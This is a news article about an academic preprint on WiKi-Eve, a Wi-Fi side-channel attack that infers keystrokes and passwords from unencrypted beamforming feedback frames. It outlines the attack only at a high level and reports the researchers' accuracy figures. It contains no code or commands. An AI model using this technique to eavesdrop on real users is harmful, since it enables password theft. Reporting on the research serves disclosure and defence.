Wi-fi traffic is encrypted, but researchers have found plaintext protocol messages provide enough data for keystroke analysis, enabling the extraction of information like passwords.
In a preprint published at arXiv, Singaporean and Chinese academics discovered that modern systems’ beamforming information (BFI) is transmitted in plain text, making it easy to eavesdrop.
BFI is a feedback mechanism introduced in 2013 with the publication of 802.11ac: the channel state is sent to the access point (AP) in cleartext in control frames, allowing the AP to more accurately direct signals towards a user device.
Their attack, dubbed WiKi-Eve (after the theoretical attacker Eve), can use any standard network interface, so long as it can be put into “monitor” mode.
Eve first acquires the victim’s (Bob, by convention) MAC address, enabling her to then obtain Bob’s IP address and launch the WiKi-Eve attack.
“By continuously recording the BFIs in the wi-fi frames from Bob during the time window of Bob’s password typing, Eve can obtain a time series of BFI samples,” the paper stated.
This can then be correlated with a password Bob uses to access a service (for example, upon contacting WeChat, the password will be transmitted early in any interaction.
The researchers then applied an adversarial learning framework trained on the cleartext BFI samples to try and extract secrets from encrypted communications.
In their tests, the researchers claimed “WiKi-Eve achieves 88.9 percent inference accuracy for individual keystrokes and up to 65.8 percent top-10 accuracy for stealing passwords of mobile applications (eg WeChat).”
The research was conducted by Jingyang Hu and Hongbo Jiang of China’s Hunan University, Hongbo Wang, Tianyue Zheng, Jingzhi Hu and Jun Luo of Nanyang Technological University in Singapore, and Zhe Chen of Fudan University in China.